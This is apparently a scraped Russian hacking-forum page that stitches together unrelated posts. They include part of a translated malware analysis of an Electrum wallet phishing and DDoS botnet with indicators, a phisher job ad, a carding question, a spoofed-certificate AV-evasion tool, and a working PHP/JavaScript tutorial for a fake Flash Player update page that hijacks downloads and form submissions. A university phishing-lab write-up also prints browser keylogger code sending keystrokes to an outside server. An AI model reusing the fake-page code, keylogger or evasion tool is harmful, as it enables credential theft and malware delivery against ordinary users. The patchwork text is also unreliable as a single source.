разработчики Electrum решили использовать ту же самую уязвимость, чтобы
отобразить законное уведомление об обновлении. Однако этого было недостаточно,
чтобы остановить злоумышленников, поэтому позже Electrum решил провести атаки
типа «отказ в обслуживании» против своих собственных пользователей, чтобы они
не могли подключаться к мошенническим узлам.
Список атакующих IP-адресов (состоящий из 72 977 машин на момент написания) постоянно обновляется. Это число почти утроилось в течение недели, подтверждая, что атаки растут быстрыми темпами.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/blocked.png](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2Ff4-Zcd_AKbdJ7jisAMEC7g1nR_WiaTeAx2BPEmrFYvdYfVmQjhqZkVQfN6VEz_zLeWSlOBfxXdkTD- vel9-HHQSpI9ZDRO1aUiA8Gr4TpKUXxUIrn2J8YB20Maf_09w33Hzt86pfcSniGUxaOQ&hash=e3317a95f95492ee430261b962105076)
Вредоносные программы, стоящие за ботнетом и DDoS-атаками
Несмотря на то, что точный размер ботнета точно не известен, мы смогли узнать
больше о том, как набираются новые боты. Мы столкнулись с вредоносным ПО,
стоящим за этим ботнетом, с двух разных путей заражения - мы предполагаем, что
существует еще несколько. Один был через экземпляр Smoke Loader, который
загружал вторичную полезную нагрузку, а другой был из комплекта эксплойтов
RIG.
В последнем случае мы наблюдали кампанию вредоносной рекламы, перенаправляющую на набор эксплойтов RIG и, в конечном счете, предоставляющую загрузчик, который может выглядеть как майнер, но на самом деле представляет собой вредоносное ПО, превращающее зараженные компьютеры в отдельных ботов для атак на отказ в обслуживании на серверы Electrum.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/RIGpayload.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FLYohcjSOrHstbyXQYPVH-l2N8yunynZ2bkeqAlqTAnNxvAoKDjQm0UOyX86xZWr4TGe0AiTPH- Cna4NuLL__QdNO5qx6DIGP2Z7cZQ5FlcvINMIRq- zA6tl6ZDVSQ5CsxPp0NBdotZCTqUA0Dw&hash=b4172ac20e870d0963f58c4bcf3af7df)
Мы видим, что загрузчик собирает список узлов Electrum для атаки с использованием нескольких общедоступных адресов кошелька. Каждая зараженная машина начнет бить законные узлы Electrum, чтобы нанести ущерб.
Анализ этого загрузчика подтверждает активность сети, которую мы наблюдали выше:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/walletsetup.png](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FJym5xE5XVArTsMYYcBu3NECCBQnCzEsKTOe5Hn2kD8p2NqWFheOzVArPQmbU8OC3WHxt6nanItZUkDkaG1LuTT14jhN_kLTDB_Fka- UOK5IEWE0HShuG98xOk0gzwmefa6-qmRj1Mz- ORCEPaQ&hash=47fdb56dba4b95738ae562a0b5003d3b)
Он извлекает большой файл (> 40 МБ), который представляет собой скомпилированный Python-код (транзакцияservices.exe) для кошелька Electrum, и записывает его на диск.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/filecreation.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FHonzz91ZAld7iK8vAKYtyCOl-i1p50ngddhhS3GGc574C5sYF_hOLsWnTaxqYq5SiC6cDm07pa5efOzgIi26qPrJXiBkM15t2Bw- LJtSYTFETlqmsVLtT6pzNRut4o6xZNCqvnP48BWjfnZGEw&hash=85577b5ea360e75aaf156b6b596baf9c)
Он также добавляет механизм персистентности для подпроцесса, называемого transactionserviceshelper.exe.
![https://blog.malwarebytes.com/wp-
content/uploads/2019/04/persistence.png](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FT-
OeoX8b-RHIMAiL1vdNJTVwe3lTMIDCHCi93rBCuQKcJim4spmeRfVVgMeq7aSM_2q9SWYWFL-
gOcAVzRacfFh8d8CvKNJdJmLpF6mlCSitUAcypz73MGvomBgzlGWIP6wsrkHcpmlT6KgupA&hash=86ca5126492a692337624431a16eb00f)
![https://blog.malwarebytes.com/wp-
content/uploads/2019/04/folder.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FlI8lkGRJiJzXdrRGEHJUPSyeAahuC4tkGCiSc0a7ycvWxbg0_2LZAcbkXmY5FLsSTc0nHdJsE_tGnB4Dw51205jZF8McO6aUAEu__Al-
yN2NLFdejygKVSyh41SwHCRH7nPHLKiXt7o6jTw9aQ&hash=0a8e9d907a366cde6fe37cd0f65f8840)
Атаки отказа в обслуживании против серверов ElectrumX
Эта атака состоит из переполнения серверов ElectrumX через порт 50002 или
50001, как видно из следующего захвата трафика:
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/flood.png](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FVFH20WFewq9eZgPCTyqPTSm6Xr94B62byZOuCxzpXZdIdt- CY73UMtlU7JnIOeNe1VxeSyrwQnUnHdwUgTdSL- YMXeSucVaz86AsPEbutS7sHLSSA87Of6_gJhcKC5IjG0eCRI-y5hYOdau- _g&hash=3f7b47e9bf1d4e4fed5b1c5498f8cd93)
Мы также заметили другой тип пакета, показанный как ложная повторная передача TCP. Это также называется «ненужной повторной передачей», когда получатель уже подтвердил получение, но инициатор все равно отправил его снова. Однако возможно, что этот трафик является побочным продуктом атак SYN.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/spurious.png](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F0f8Azk9oaCw50-GnfGDeW9ftQTgrfhfwNBb0XDup1JfUDud9EuaDEAQHFP7z_4fuAFfAqvUdrnalRfpOKhfpJ8ZUfomkTLZRGW220DPRyha- eBPGGERn7OrqlOcE30VsMZ_1fjH1MXqiIvQVxA&hash=f6d5a687fcb81d50c9088a9790fc496d)
IP-адрес лабораторного компьютера, который мы использовали для детонации вредоносного ПО, попал в черный список в том же обновленном списке клиентов, которые атакуют серверы Electrumx, упомянутые выше, что подтверждает наше временное присутствие в этом ботнете.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/blacklist.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FrKC0I7O95rpmNalBlkmdyfnp-8j55491Q7oSeUZLJtIHIanKzfF0M2EgqK0pRMgFEXp1uLyJgLtnbqHPwVs4OattMAN5XrhkLXV2wlHU89z5rDmhws5qljAjkG6kCSYN- HpQHJJwupT6xK4T_Q&hash=5920163653790d30d6cf8f3f673d423c)
Согласно нашей телеметрии, это распределение большинства жертв, участвующих в DDoS в течение последних нескольких дней, на основе попыток подключения к серверам управления и контроля вредоносных программ.
![https://blog.malwarebytes.com/wp- content/uploads/2019/04/chartgraph.png](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FCJ065zYogtZu4hdjFDDABlds5DjQKpOta4BYOcu_91IA_bai9tjgBTtqXYpfl0a9slp4xNvYwZvq0_GTIT9MdbJ0b1NkWGtvuvirC_ogXS3WW- sMfVW3UHr6t2UXB_txau3nCYKzC0PBGrZXHw&hash=7dcad55d6fd52dd70359788e97fac446)
Продолжающиеся атаки и еще больше воровства на горизонте
Любой, кто отслеживает криптовалюты, знает, что их ждет ещё много атак.
Определенные участники угроз использовали уязвимость в самом популярном
биткойн-кошельке, чтобы создать ловкую фишинговую атаку, которая за несколько
месяцев принесла им более 3 миллионов долларов США.
Люди, работающие на собственных серверах Electrum, могут по-разному смягчать атаки DDoS. Они могут настроить работу cron, чтобы загрузить список атакующих IP-адресов и заблокировать их. Они также могут создать правило iptables для ограничения скорости попыток подключения к известным портам, которые подвергаются атаке.
Пользователям кошелька Electrum необходимо обновить программное обеспечение до последней версии (3.3.4) из официального репозитория и быть особенно осторожным с обновлениями или другими предупреждающими сообщениями, которые могут быть замаскированы при попытках фишинга.
Malwarebytes обнаруживает вредоносные кошельки для Mac OS X как OSX.ElectrumStealer и Electrum.Stealer для Windows.
IOCs
Двоичные файлы кошелька Electrum
Code:Copy to clipboard
137e8925667ff75b1c516a97b5d2d3dd205f9302cdeb190fc68855aee2942c22
1900f4d0a13486f90ff5f82e02d210b8a9db27bca24b88f5de849ef124212f09
1ef6c9d9d3519769749498631532063967fc7d5e8f0fc75e8a3ff66f57dfab22
2747c4e43d2652f3ad039e0dc1bf28f5b136a9ac76a4f57320b08b5905e7c4cd
2cd180e61e36de1be904a02591485ef3321b539cdccca1fd7f1f001770652b14
307d97a38c6bf21903057eec48c4d3957e10c0097fe05d5a203101d22cd79cc3
3610c86975ed943b5065bdc65bfcb4035e58a863cd3192865401bc6a70b023ba
367b620a0a332f693a68230bf21f7036983b7b9e0dee946af5338ed168c16318
36c3140d73fbfb5710438d7c218013bf6fb8736a98dfe002b0d711fbb39aad41
41ff4f112d0a8c4bb20a49f7beb5f36c28455a9cebafa8db75277f54f597d6d4
57f6ef3ea9e497592bdbe9dda201105e0faea8f6668b5701b6b91fbc9e94cd43
634287c65f018e71ed7bebfb5b21e33bcedf08139e3d924178b4cdfaa12d8b34
74c2dcf751796cd209755b4e828b6686b2fb38587163b1cbff1295da2d3f0a8c
87aa1fdf00db2ed94464c2687a0e1011a80af576267c0f88d1216c0cb4d2e310
9a5b1ffbeb562d772dfa2d49e59e0f72557f6111a5e24d6498f88b77a5d8f10a
a080444918844e27ff2079b71f20ebd2d1f1836907c854671daa3548dc809e7c
b20778f69cc959a16c612e75d21a3668aab11f47f2659c3175da5bd80665e225
c48b7ba2531e4954881388aceb00a2ec36488f1cf70eeb873a97b7cfa32362cb
c5afedd8a03d2f49e25fb2c568ede20b0e43a4eeebebd202c98324ead9b82732
df154484a90321407c0e8115df7bf6f598adb6a50255cc58b723db7cc5d3729f
e8ef9cbeec7cdc7f58e28274c417457c5c8dcf47f4e8409cb2befe9450d3868b
f736c8fa4a21755020ecfce60a53d0a1cfdaa7061fd7be6efd49d74af9b13e02
Поддельные домены
Code:Copy to clipboard
btc-electrum[.]com
btcelectrum[.]org
downloadelectrum[.]com
downloadelectrum[.]org
eiectrum[.]net
electrum[.]bz
electrumapp[.]org
electrumapps[.]com
electrumbase[.]com
electrumbase[.]net
electrumbase[.]org
electrumbitcoin[.]org
electrumbtc[.]org
electrumbuild[.]com
electrumcircle[.]com
electrumclient[.]org
electrumcore[.]com
electrumcore[.]net
electrumdownload[.]com
electrumdownload[.]org
electrume[.]com
electrume[.]org
electrumfix[.]com
electrumget[.]com
electrumget[.]com
electrumhub[.]com
electrumnet[.]com
electrumofficial[.]com
electrumopen[.]org
electrumpgrade[.]com
electrumsafe[.]org
electrumsite[.]com
electrumsource[.]org
electrumstart[.]org
electrumtxn[.]com
electrumupdate[.]com
electrumupgrade[.]com
electrumupgrade[.]org
electrumware[.]com
electrumware[.]org
electrumweb[.]net
getelectrum[.]com
getelectrum[.]live
getelectrum[.]org
goelectrum[.]com
myelectrum[.]org
Атакующие Биткойн адреса
Code:Copy to clipboard
bc1qhsrl6ywvwx44zycz2tylpexza4xvtqkv6d903q
bc1q92md7868uun8vplp9te0vaecmxyc5rrphdyvxg
bc1q7hsnpd794pap2hd3htn8hszdfk5hzgsj5md9lz
bc1ql0p2lrnnxkxnw52phyq8tjr7elsqtnncad6mfv
bc1qyjkcthq9whn3e8h9dd26gjr9kd8pxmqdgvajwv
bc1q9h36cyfnqcxjeuw629kwmnp5a7k5pky8l2kzww
bc1qvr93mxj5ep58wlchdducthe89hcmk3a4uqpw3c
bc1qcla39fm0q8ka8th8ttpq0yxla30r430m4hgu3x
14MVEf1X4Qmrpxx6oASqzYzJQZUwwG7Fb5
3CrC4UitJqNqdkXY5XbJfCaGnbxHkKNqzL
31rTt8GePHv8LceXnujWqerUd81U29m857
1FmxAHft8trWjhRNvDsbjD8JNoSzDX8pfD
Мошеннические / вредоносные цифровые сертификаты (только для Windows)
Code:Copy to clipboard
Name: PRO SOFTS
Serial Number: 15 8F D7 D2 FB 6E 69 E7 75 AB EE 6E
Name: EIZ Ltd
Serial Number: 06 6A F7 6B 79 4F 63 79 3C C0 CA 33 78 6F 07 47
RIG EK полезная нагрузка
9296b210b782faecca8394b2bd7bf720ffa5c122b83c4ed462ba25d3e1b8ce9a
transactionservices.exe (Electrum wallet)
c3a7cf30428689a44328090b994ce593bbf2a68141fcbefb899dee4fec336198
IP-адреса (хост хоста Electrum и конфиги)
Code:Copy to clipboard
178.159.37[.]113
194.63.143[.]226
217.147.169[.]179
188.214.135[.]174
Банк клиент BSS актуальный? Имеет смысл пилить стиллер под него для бота?
Hi, I need a blackhat spammer / phisher for non-standard jobs / project in the
US, at least 1000 - 8000 dollars for work
requirement
other requirements will be brought to the attention of the aquifer
write me in PM for details of the work and contact information or by email:
VIRTUAL99@PROTONMAIL.COM.
На какой кошелек можно вывести деньги с американской кредитной карты?
CarbonCopy
Инструмент, который создает поддельный сертификат любого интернет-сайта.
пример:
Code:Copy to clipboard
python3 carboncopy.py www.facebook.com 443 anyname.exe signed-anyname.exe
certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux ](https://github.com/paranoidninja/CarbonCopy)
A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux - paranoidninja/CarbonCopy
github.com
Добрый вечер!
Задался вопросом, какой номер стоит за номером 900 и как его узнать, может кто
в курсе или кто то сталвивался
Нужно для переадресации смс
Буду рад любой инфы, заранее спасибо!
Недавно нашёл полный аналог премиум ютуба
Вот ссылка https://youtubevanced.com/
Тема старая, но до сих пор рабочая.
Опубликована мной на экспе ещё в 2к17.
Информация может и не новая для кого либо, но я давно был заинтересован
подобной подделкой.
Сменилась информация на основном сайте ? - Меняется информация и на нашем
фейке.
Хотим сделать фейк обновления Flash Player, пишем следующий код :
PHP:Copy to clipboard
<?php
$flash = file_get_contents ('https://get.adobe.com/flashplayer/'); //получаем страницу офф.сайта
echo $flash;
?>
<script type="text/javascript">
document.getElementById("buttonDownload").href="flashplayer.exe";
</script>
До того как мы заюзали js, наша кнопка для скачивания плеера имела совсем другую ссылку, после того как мы использовали код который выше, ссылка на кнопке сменилась на "flashplayer.exe".
Прошу заметить что наш фейк работает в режиме онлайн, функция file_get_contents парсит всю информацию с настоящего сайта, и только потом мы с помощью js меняем что нам нужно.
Скриншот : https://image.prntscr.com/image/DAshcsbIRm2MOZzfUV8MaA.png
Тот же текст на нашей странице можно менять следующим методом:
JavaScript:Copy to clipboard
document.body.innerHTML = document.body.innerHTML.replace('Что нужно заменить', 'На что заменить');
Скриншот : https://image.prntscr.com/image/_qEQLDIRSeSVNWgnyqPLrw.png
Таким же макаром можно менять и action формы для вставки обработчика и получения чужих данных с формы.
Что-то подобное:
JavaScript:Copy to clipboard
document.getElementById('form-id').attributes.action.value
Фишинг Яндекса. Как студенты писали фишинговые письма. Практические примеры
Я решил разнообразить учебный процесс и придумал несколько заданий для пятикурсников — таких, чтобы практика и актуальность, а не списывать код из 2003 года. Одно из заданий — придумать и отправить фишинговые письма вымышленным людям, которые могли бы существовать в реальности. Ведь если не знаешь, как нужно атаковать, то и не узнаешь, как защищаться, верно?
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F6y%2Fjv%2Fpk%2F6yjvpkw- obxhkdgwdup2dpdhyze.png&hash=26344ea807666cc48b142065144baabb)
Я покажу лучшее из того, что получилось: какие письма мошенники могли бы посылать от имени Яндекс.Денег, как студенты прикидывались сервисами, а на десерт — приёмы, которые мошенники используют прямо сейчас (на примере нескольких писем, полученных нашими бдительными пользователями).
Драматургия
Все люди разные — с разным опытом, знаниями в IT и разной верой в людей, — поэтому я придумал трех персонажей и попросил студентов найти к ним подход. Ограничения были чисто техническими — письмо нужно отправить на указанный ящик, оно не должно попасть в спам, и должен быть способ собрать персональные данные. Какие именно — на усмотрение студента.
Полное задание на лабораторную работу — под спойлером.
Spoiler: Задание на лабу
Нужно отправить три письма трём выдуманным персонажам.
Условия
1. Письма нужно действительно отправить на указанные почтовые ящики. Через
napechata.li/form нужно выслать список адресов, с которых ушли письма.
2. Считается, что персонажи открывают письма на рабочих компьютерах в рабочее
время.
3. При написании нужно использовать индивидуальные особенности персонажей,
указанные в задании. По умолчанию считается, что письмо, написанное кому
угодно и без деталей, не идет в зачет.
4. Цель атаки — доступ во внутреннюю сеть или к данным (почта, календари,
архивы, финансовая информация) организации, в которой работает каждый из
персонажей. Меньший приоритет в получении личных данных персонажей.
5. От кого, под каким предлогом и как будет совершаться атака, остаётся на
ваше усмотрение. Использование доп. средств (скрипты, документы с макросами,
софт) идет в зачет при наличии подходящей легенды.
6. Письма, попавшие в спам, не идут в зачёт.
7. Письмо, ссылка в котором никуда не ведёт, не идёт в зачёт.
В отчете должны быть:
1. Тексты или скриншоты писем
2. Описание того, почему каждому из пользователей было отправлено письмо
3. Какую информацию планировалось получить после отправки писем
4. Какую информацию удалось получить после отправки писем
5. Список адресов, с которых отправлена почта
Валерия Валерьевна Голова, 31 год, Усть-Каменогорск
Юрист в частной юридической фирме "Мягкий знак". Почта —
odnagolowa@yandex.ru.
Валерия — гуманитарий от природы, но технарь в душе. Она закончила Усть- каменогорский техникум информационных технологий и работает юристом- сисадмином в частной компании из четырех человек.
Click to expand...
Валерия любит сохранять ламповые картинки в социальных сетях, ведёт блог в ЖЖ, где делится снами, а по воскресеньям ходит на бесплатные концерты, которые находит в группе «Бесплатные концерты Усть-Каменогорска».
Click to expand...
Хусанбой Эрдашевич Сотвондиев, 19 лет, Санкт-Петербург
Таксист в таксопарке "Тимошинский". Почта —
husanboy7902301@mail.ru
Хусанбой приехал в Петербург из Ургенча, где 3 года работал таксистом. Сейчас продолжает заниматься этим же в Санкт-Петербурге на старенькой Киа Рио, которая досталась ему от друга. Раньше Хусанбой записывал рэп-треки и публиковал их без псевдонима, а сейчас просто следит за новыми артистами, поэтому зарегистрирован на всех популярных тематических сайтах.
Click to expand...
Альберт Михайлович Альберливе, 54 года, Хабаровск
Самозанятый. Почта — al.ber.live@outlook.com
Альберт Михайлович за свою жизнь повидал многое — отправлял письма Мавроди, заряжал воду с Кашпировским и был платиновым агентом Тяньши с сетью из 22 человек. Сейчас он снова ждет выхода на пенсию и, чтобы не терять времени зря, решил вложиться в биткоины и Кэшбери. У Альберта Михайловича есть профили по всех соцсетях, электронные кошельки во всех русскоязычных сервисах и невероятная вера в людей и технологии.
Click to expand...
Понаприсылали
В этом году у студентов было меньше времени — поэтому первые письма пришли довольно быстро. Тем не менее в большинстве из них отражены реальные паттерны фишинга, которые студенты нашли в интернете и попытались применить к условию задачи.
Альберт Альберливе
Честно говоря, этот персонаж интриговал меня сильнее всего — что же будет, какие письма и от каких сервисов полетят? Финансовые пирамиды, электронные кошельки, криптовалюты? Студенты не разочаровали — во «Входящих» оказались письма на все эти темы и от большинства популярных платежных систем. Хочется показать все до единого, но, к сожалению, это невозможно.
Фишинг от имени Яндекс.Денег
В первую очередь меня интересовали письма от имени Яндекс.Денег.
Все студенты, которые прислали письма от имени сервиса, применили похожий подход — анонсировать некий новый продукт, который спасёт от всех проблем и поможет заработать. Как я покажу дальше, это не совсем соответствует реальному поведению мошенников.
Напомню, что все официальные приложения Яндекс.Денег живут в специальном разделе на сайте Яндекса, а анонсы новых штук — в пресс-службошной. Проверьте там, если вдруг увидели необычный или шокирующий анонс про Яндекс.Деньги в непонятном источнике.
А теперь давайте посмотрим, что с этими письмами не так. Специально для этого я поймал в коридоре Наташу, лид-редактора Денег, и показал скриншоты. Наташа знает всё о том, как пишут и не пишут в Деньгах, этим я и воспользовался.
Вопрос был простой: как понять, что это написали не у нас? Передаю микрофон:
Яндекс.Криптокошелёк
Верхнеуровневое: непонятно, почему пользователь вообще получает письмо на эту тему; письмо про то, чем вообще хороши криптовалюты, — но чем они могут быть полезны именно мне, неясно.
По тексту: восклицательные знаки (у нас их почти нет), канцелярит на канцелярите (обеспечение безопасности проведения транзакций — ) + небрежность с типографикой.
Яндекс.Спасатель
— Имя + почта в обращении.
— Неконкретность: что значит «скомпрометирована»? Ну и я тут причём?
— Опять канцелярит.
— Что такое «подтверждённое восстановление», хотела бы я знать.
— Никакой связи заголовок + кнопка (мы обычно стараемся, чтобы эта комбинация
давала общее представление про самую суть).
Техподдержка Яндекс.Денег
Здесь плохо всё: от мелочей типа небрежного оформления до главного посыла (почему в противном случае аккаунт не подлежит восстановлению — это же шантаж неприкрытый).
В общем, подытожила Наташа, мы так не пишем. Давайте перейдем к другим примечательным примерам.
Горячие письма для Альберта
Новый инновационный майнер
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fk_%2Fad%2Fdh%2Fk_addhx-
pzajrqwmmttq3b3ps5m.png&hash=cbde27f4cadf7c4758025d416ea84c85)
Прогрессируйте без забот.
Click to expand...
Вы всегда хотели прикоснуться к миру крипто валют, но не знали с чего начать? Используйте наш майнер во время того, когда не пользуйтесь компьютером. Даже время будет работать на вас.
Click to expand...
Вперед.
Click to expand...
Все для начинания в одном наитии http://clc.am/ \
Click to expand...
В этом письме прекрасно всё — не хватает только нормальной кнопки с призывом к действию. Вместо неё маленькая ссылка внизу, которая еще и не кликается. В общем, полный провал потенциальных криптогениев крипторынка.
Обещанные плюшки — не прилагайте усилий, всё работает само, без вложений. Ну да, конечно.
Инвестиционная трейд-платформа нового поколения
Нужны ли здесь какие-то комментарии?
Фотобанкир из фотобанка
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fvs%2Fxz%2Fvn%2Fvsxzvnh-
to_3mkoy-4yor2zgiae.png&hash=6d55f672b971838861ad8c9e77e9e370)
Как добавить письму солидности? Конечно, использовать фотографии из фотобанков. Удивительно, что ниже в этом же письме нет улыбающихся людей в деловых костюмах.
Валерия Голова
Валерии присылали много писем из ЖЖ, VK, с курсов осознанных сновидений, сайтов с мероприятиями и даже несколько сообщений от фанатов её блога.
Горячие письма для Валерии
Рекламная платформа
ЖЖ не стоит на месте и развивается. Валерии предложили выбрать рекламные категории — почему бы не воспользоваться таким прекрасным предложением?
«Злоумышленник» постарался — ссылка в письме ведет на сайт на бесплатном хостинге, где в стилях ЖЖ нарисовали форму для ввода персональных данных и карточной информации.
Очень легко ничего не заподозрить — но достаточно проверить адресную строку. К тому же когда я в первый раз открыл эту ссылку и ввёл выдуманную карту, увидел вот такой поп-ап:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fnw%2F_f%2Feq%2Fnw_feqlwom- vurld0bdhi_d5brs.png&hash=3bcc3e0b8ca7dcece08459f830887d4b)
Предупреждают не зря — сайт действительно опасен.
Такие «сайты» на бесплатных хостингах долго не живут и к тому же заполнены водяными знаками. А на платном хостинге (и с доменом второго уровня) можно отправить жалобу на фишинг и мошенничество. Как показывает практика, такие сайты активно блокируются — например, наша СБ регулярно рассылает заявки регистраторам, когда обнаруживает какую-нибудь новую мошенническую схему.
Десктопное приложение Живого Журнала
Ребята не поленились и написали даже десктопное приложение — ну какие же молодцы. Даже просмотр публикаций без интернета прикрутили.
Ссылка ведет на ехе-файл: [http://ххх.193.52.92/livejournal_desktop_1.0.3b.exe](http://xn-- u1aaa.193.52.92/livejournal_desktop_1.0.3b.exe). Загружать его я, конечно, не буду.
Перед установкой любых приложений из сомнительных источников (а почта — очень сомнительный источник) сходите на официальный сайт и проверьте, есть ли оно там вообще. И если есть, установите оттуда.
Браузерное расширение
Я люблю своих студентов и практически не ограничиваю их фантазию. Это приводит к тому, что приходят и такие письма. Привожу целиком — настолько это прекрасно.
Здравствуйте, Валерия Валерьевна.
Вам пишет команда молодых разработчиков сервиса "Your Favourite Song". Мы создаем культурную среду, в которой каждый может себе найти занятие по-вкусу! В данный момент мы разрабатываем приложение для браузера, которое является агрегатором всех культурных событий, что проходят в нашем замечательном городе! Начать мы решили с создания подборок всех бесплатных и платных концертов нашего города. Зная о Вашем увлечении музыкой из блога в ЖЖ, мы решили предоставить Вам замечательную возможность опробовать наше расширение одной из первых, и возможно, послужить благому делу и оставить у себя в ЖЖ отзыв, как только расширение перейдет из стадии закрытого бета-тестирования в открытый бета-тест. Для того чтобы установить данное расширение - перейдите по ссылке и скачайте с нашего приватного хранилища расширение, затем установите его. Инструкцию по установке мы напишем ниже.
1. Перейдите по ссылке https://goo-gl.ru/OK и скачайте zip-архив.
2. Распакуйте zip-архив в любую удобную папку.
3. Зайдите в ваш браузер во вкладку расширения.
4. Нажмите на кнопку "добавить стороннее распакованное расширение".
5. Перейдите в папку, куда Вы распаковали наше расширение и укажите путь к папке keylogExten.
6. В течение недели мы добавим вас в нашу базу данных и удаленно активируем функционал нашего расширения.
7. Наслаждайтесь удобным сервисом!
С уважением,
команда "Your Favourite Song".
Здесь подход радикальнее всего, что присылали в этом году. По ссылке — сокращалка, которая редиректит на облачную хранилку. Там лежит браузерный кейлоггер, запакованный в два архива. В нём — простой event listener, который работает на jquery, слушает события keydown, собирает коды в пакеты и отправляет их на некий сервер.
Code:Copy to clipboard
function sendSymOnServer(page, data) {
var xhr = new XMLHttpRequest();
var body = 'page = ' + encodeURIComponent(page) +
'&data = ' + encodeURIComponent(data);
xhr.open("POST", 'https://requestb.in/1fa7izj1', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(body);
}
Естественно, никогда не устанавливайте лишних расширений — особенно тех, в описании которых есть слово keylog.
Пиши, сокращай
Как и в прошлом году, не обошлось без гениального копирайтинга. Пока я писал эту статью, выяснилось, что копирайтером был кто-то еще, а студент взял текст из интернета.
К этому моменту все контекстные рекламные баннеры показывают мне всякое про осознанные сновидения. И вам, кажется, тоже. Не благодарите.
Письма от поклонников
Как по мне, самая опасная разновидность фишинга. Злоумышленник разведал обстановку и бьет по больным местам — всем бывает сложно справиться с похвалой, лестью, признанием и не начать отвечать мошеннику.
Вот пример:
Добрый вечер, Валерия.
Click to expand...
Прошу прощения за беспокойство, Меня зовут Дмитрий, и в первую очередь хочется поблагодарить Вас за Ваши тёплые посты в журнале.
Click to expand...
Наверное, я бы так и оставался молчаливым читателем, вдохновляющимся Вашим примером, но Ваш вчерашний сон всё не выходит у меня из головы.
Click to expand...
Он напомнил мне работы талантливого художника-визионера по имени Фрейдун Рассули, и в большей степени — его картину "Путешествие домой".
Click to expand...
Как и в Вам, этому художнику близка тема космического единства: он был уверен в том, что любое творение является продуктом синхронизации наших энергий со Вселенной.
Click to expand...
Мне подумалось, что Вам будет интересно подробнее ознакомиться с его творчеством, поэтому я подобрал самые утончённые и глубокие из его работ.
Click to expand...
К сожалению, не могу прикрепить их все разом, но могу предложить Вам архив с моей собственной подборкой.
Click to expand...
https://cloud.mail.ru/public/Bg6E/WKr64w
Click to expand...
Уверен, Вы сможете найти среди этих удивительных картин немало сходства с Вашими снами. И, мне кажется, они будут замечательно смотреться в Вашем блоге.
Click to expand...
С наилучшими пожеланиями,
Click to expand...
Ваш постоянный читатель.
Click to expand...
По ссылке лежит файл Рисунки.exe, в котором, конечно, нет никаких рисунков, но есть кейлоггер.
И ещё один поклонник:
Здравствуйте, Валерия Валерьевна.
Меня зовут Дмитрий, можно просто Дима.
Я немного следил за вами на ЖЖ. У вас весьма удивительные сны. Вы же ведь знаете, что каждый сон может что-то значить? Я немного в этом разбираюсь и даже иногда веду записи о толковании снов в своем ЖЖ. Мне бы очень хотелось поделиться ими с вами. А также побольше пообщаться с вами. К вам можно обращаться на "ты"? С нетерпением жду ваших высказываний по поводу моих мыслей.
С уважением,
Ушков Дмитрий.
Под ссылкой очередная форма авторизации в ЖЖ на бесплатном хостинге (до точки — livejjournal). Там есть https, так что браузеры не ругнутся, но внимательно смотреть всё-таки нужно.
Антифишинг
К слову, после первых нескольких писем Яндекс прислал письмо о том, как отличить хорошие письма от писем мошенников. Бдят.
Хусанбой Сотвондиев
Студенты хорошо уловили шуточный дух задания и понаприсылали вещей, которые вызывали у меня диапазон эмоций от нервного смеха до недоумения. В общем, как мне кажется, хорошо справились. Персонажу приходили письма от рэп-сайтов, штрафы с порталов госуслуг, письма из таксопарков (среди них был только один с названием «Тимошинский») и, по традиции, несколько личных писем.
Горячие письма для Хусанбоя
Конкурс неизвестных рэп-исполнителей
Обращаюсь в первую очередь к неизвестным рэп-исполнителям, которые пришли на эту страницу поучаствовать в конкурсе.
Йоу, ребята, никогда не реагируйте на такие письма, в этом нет никакого смысла.
Здравствуйте Хусанбой!
Вас беспокоит тех.поддержка сайта молодых исполнителей хип-хоп музыки. За Вашей учетной записью была замечена подозрительная активность, поэтому Ваш аккаунт был заблокирован. Для восстановления доступа к аккаунту и участия в последующем конкурсе неизвестных исполнителей с призом в 6 млн.рублей Вам следует подтвердить свою учетную запись и предоставить данные для участия в конкурсе в форме ниже. Все введенные Вами данные будут тщательно проверяться для осуществления безопасности конкурса и его справедливого проведения. Также должны Вас предупредить о том, что до окончания конкурса изменение и восстановление логина/пароля и личной информации в учетной записи невозможно, поэтому для логина/пароля вводите то, что Вы точно не забудете или вводите ежедневно, а информацию о себе только верную.
Если вы смогли дочитать этот текст, ни разу не перескакивая глазами, расскажите, что там. Ссылка после письма ведёт на гугл-форму из 30 полей (троянский слон!), самые примечательные из которых:
Никогда не вводите на незнакомых сайтах ФИО сотрудников, которым, возможно, было бы интересно направление хип-хоп.
Антивирус Сотвондиева
Добрый день!
Click to expand...
В связи с ужесточением политики обработки персональных данных в нашем таксопарке всем сотрудникам необходимо использование сертифицированное средство безопасности.
Click to expand...
В качестве такого средства в нашей компании был выбран Kaspersky Endpioint Security, имеющий сертификаты соответствия ФСБ СФ/019-3471 и ФСТЭК №3025.
Click to expand...
Скачать установочные файлы данного средства можно по следующей ссылке:
Click to expand...
[http://aes.s.kaspersky- labs.com/end...-2778/bb0e36ac/keswin_11.0.1.90_ru_aes256.exe](http://aes.s.kaspersky- labs.com/endpoints/keswin11/11.0.1.90/russian-2778/bb0e36ac/keswin_11.0.1.90_ru_aes256.exe)
Click to expand...
